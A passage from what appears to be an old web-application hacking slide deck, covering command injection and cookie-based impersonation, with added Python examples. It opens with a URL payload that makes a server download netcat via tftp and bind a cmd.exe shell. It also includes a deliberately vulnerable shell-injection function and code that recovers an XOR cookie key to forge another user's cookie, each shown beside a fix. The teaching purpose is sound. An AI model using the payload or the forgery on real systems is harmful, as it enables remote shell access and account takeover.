    http://www.site.com/cgi-bin/hello.bat?&tftp%20-i%20GET%20nc.exe%20c:\temp\nc.exe&c:\nc.exe%20-L%20-p%204000%20-e%20cmd.exe
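The metacharacter, SSI and Sambar batch-file cases in this section all come down to one pattern: a parameter is pasted into a command line that a shell then interprets. The added example below (not code from the Foundstone deck) shows that pattern in a small lookup script beside the fix, which decodes the parameter once, validates it against an allowlist, and runs the program with an argv list and no shell so that `;`, `&&`, `|` and backticks have no meaning. It uses `echo` in place of a real finger/lookup program so that it runs anywhere; the username rule is this example's own.

```python
"""Local command execution through a script parameter, and the fix."""
import re
import subprocess
from urllib.parse import unquote

# Allowlist: what a username is permitted to look like (example's own rule).
USERNAME_RE = re.compile(r"^[a-z][a-z0-9_-]{0,31}$")


def lookup_vulnerable(param):
    """Shell concatenation: text after ';', '&&', '|' or inside backticks runs as a second command."""
    cmd = "echo looking up " + unquote(param)     # the web server decoded %3B to ';' for us
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def is_valid_username(param):
    """Decode exactly once, then accept only the allowlisted shape."""
    value = unquote(param)
    return USERNAME_RE.match(value) is not None


def lookup_safe(param):
    """Fixed: reject anything not allowlisted, then pass the value as a single argv element."""
    value = unquote(param)
    if not is_valid_username(param):
        raise ValueError("rejected parameter: %r" % value)
    # argv list and shell=False: the argument reaches the program verbatim, uninterpreted.
    return subprocess.run(["echo", "looking up", value], shell=False,
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    for p in ("alice", "alice;echo INJECTED", "alice%3Becho%20INJECTED"):
        print(repr(p), "->", repr(lookup_vulnerable(p)), "valid:", is_valid_username(p))
    print(repr(lookup_safe("alice")))
```

Even with argv and no shell, the called program can still treat an argument as an option, so the allowlist (which here forbids a leading `-`) matters as much as dropping the shell.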

    86/93

    Impersonation

    Impersonating another web user can be accomplished by understanding the way authentication is performed on the server.

    87/93

    Impersonation

    Methodology

    Determine state tracking

    Attempt to reverse engineer the cookie encryption method

    Spoof cookies to impersonate a user

    88/93

    Impersonation

    Determine state tracking

    All e-commerce sites must track a user's state in some manner.

    HTTP is by its nature stateless (each request is a separate transaction, whatever TCP connection carries it), making it difficult to associate web requests with an individual.

    The cookie solution.

    89/93

    Impersonation

    Determine state tracking

    Cookies allow a web developer to track and remember a user while shopping by inserting information into the cookie file.

    Netscape:
    C:\PROGRAM FILES\NETSCAPE\USERS\DEFAULT\COOKIE.TXT

    IE:
    C:\WINNT\PROFILES\ADMINISTRATOR\COOKIES


    91/93

    Impersonation

    Determine state tracking

    Cookie Pal by Kookaburra Software (http://www.kburra.com/)
    92/93

    Impersonation

    Determine state tracking

    Reverse engineer the cookie state information and you will be able to make purchases as someone else.

    The state is often based on a combination of name/password/date/time/IP address, or some other relevant data.

    It is usually protected by some form of XOR or DES "encryption". Encryption alone does not stop tampering: once the key is recovered, or a cookie is simply copied, an attacker can produce a valid cookie for another user.
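The XOR case from the slide, worked through as an added example (not code from the Foundstone deck). weak_cookie() is a constructed stand-in for a site that XORs "user|date|ip" with a fixed key; an attacker who knows his own plaintext (his username, the date, his IP) recovers the keystream with one XOR, spots the repeating key, and forges a cookie for any other user. issue_token()/check_token() show what to issue instead: the state in the clear plus an HMAC under a server-only key, which cannot be forged without that key and has no "encryption" to reverse. The keys are constructed for the example.

```python
"""Reverse-engineering an XOR-protected cookie, and the HMAC-based replacement."""
import binascii
import hashlib
import hmac

SITE_KEY = b"k3y!"                              # constructed: the site's fixed XOR key
HMAC_KEY = b"constructed-server-secret"         # constructed: known only to the server


def xor(data, key):
    """XOR data with a repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def weak_cookie(user, date, ip):
    """What the vulnerable site hands out: hex(state XOR key)."""
    state = "%s|%s|%s" % (user, date, ip)
    return binascii.hexlify(xor(state.encode(), SITE_KEY)).decode()


def decode_weak(cookie):
    """Server side of the weak scheme (used here only to check a forgery)."""
    return xor(binascii.unhexlify(cookie), SITE_KEY).decode()


def recover_key(cookie, known_plaintext):
    """ciphertext XOR known plaintext = keystream; a repeating key shows up as a short period."""
    ks = xor(binascii.unhexlify(cookie), known_plaintext.encode())
    for period in range(1, len(ks) + 1):
        if all(ks[i] == ks[i % period] for i in range(len(ks))):
            return ks[:period]
    return ks


def forge(cookie, known_plaintext, target_state):
    """Attacker: recover the key from his own cookie, then encrypt someone else's state."""
    key = recover_key(cookie, known_plaintext)
    return binascii.hexlify(xor(target_state.encode(), key)).decode()


def issue_token(user, date, ip):
    """Fixed scheme: readable state plus an HMAC-SHA256 tag under the server's key."""
    state = "%s|%s|%s" % (user, date, ip)
    tag = hmac.new(HMAC_KEY, state.encode(), hashlib.sha256).hexdigest()
    return state + "|" + tag


def check_token(token):
    """Return the user if the tag verifies (constant-time compare), else None."""
    state, _, tag = token.rpartition("|")
    expected = hmac.new(HMAC_KEY, state.encode(), hashlib.sha256).hexdigest()
    return state.split("|")[0] if hmac.compare_digest(expected, tag) else None


if __name__ == "__main__":
    mine = weak_cookie("mallory", "2000-02-26", "10.1.1.1")
    print("recovered key:", recover_key(mine, "mallory|2000-02-26|10.1.1.1"))
    forged = forge(mine, "mallory|2000-02-26|10.1.1.1", "admin|2000-02-26|10.1.1.1")
    print("forged cookie decodes to:", decode_weak(forged))
    tok = issue_token("alice", "2000-02-26", "10.1.1.1")
    print("token ok:", check_token(tok), "edited:", check_token(tok.replace("alice", "admin")))
```

The HMAC token still needs an expiry and a binding to the session it was issued for, since a copied token replays just as well as a copied cookie; what it removes is the attacker's ability to mint one.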

    93/93

    Wrap-up

    Overview

    Background and Primer

    Information gathering

    Viewing Source

    Application design

    File System Traversal

    Input Validation

    Impersonation